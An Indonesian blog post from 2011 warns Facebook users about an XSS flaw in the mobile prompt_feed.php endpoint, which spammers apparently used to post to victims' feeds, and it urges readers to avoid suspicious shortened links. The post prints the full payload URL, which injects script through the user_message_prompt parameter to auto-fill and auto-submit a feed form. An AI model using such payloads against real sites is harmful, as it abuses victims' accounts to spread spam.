Home » Facebook » New Facebook BUG via Sharer Link
17 Apr 2011 14:35 By : admin ,



Klaten.tk - Sebuah Software yang begitu sempurna daripada yang lain memiliki kelemahan script selemah script Anak kecil?. jangan pernah meragukan XSS Cross Scripting Javascript... dari method PHP GET
. karena resiko nya itu bisa berakibat pada database dan struktur software. barusaja yang di katakan tante cebong tentang jangan mengklik link url Shorten mencurigakan lwat facebook Sharer Feed seperti dibawah ini

img


benar Feed tersebut dibuat lewat XSS Cross scripting lewat facebook API prompt_feed.php
dimana target XSS GET value nya adalah

Code:
user_message_prompt


maka dari itu jangan mengklik link mencurigakan tersebut karena mungkin dsono kbanyaka iklan iklan ga karuan :hammer:
dan juga pesan dari TS. kalo ktemu Abuse feature facebook langsung di Submit ke facebook Bug developer
dan struktur dari jebakan XSS Scripting itu sebagai berikut

Code:
http://m.facebook.com/connect/prompt_feed.php?display=wap&
user_message_prompt='%3Cscript%3Ewindow.onload=function()
{document.forms[0].message.value='kata spammer disini';document.forms[0].submit();}%3C/script%3E



dan semoga kalian semua agar tidak gampang tertipu...

pedoxinside


Share: |
Short URL: http://klaten.tk/172
Comment (3)
Irvan Sadewa memposting...
Yup, memang sekarang harus lebih berhati-hati. banyak jebakan batman dimana-mana. :)
abt memposting...
pertamax ga pertamax yg penting komengggg hehiehihihiehiehehihie.. :D
Amri Karisma memposting...
Siap gan.. laksanakan.. Pertamax kah ?
View All

Leave a Comment
Name* :
Url :
Comment*:
[BB Code] [Smiley]
Code*:
39 Online | Today: 94 visit | Total: 65535 visit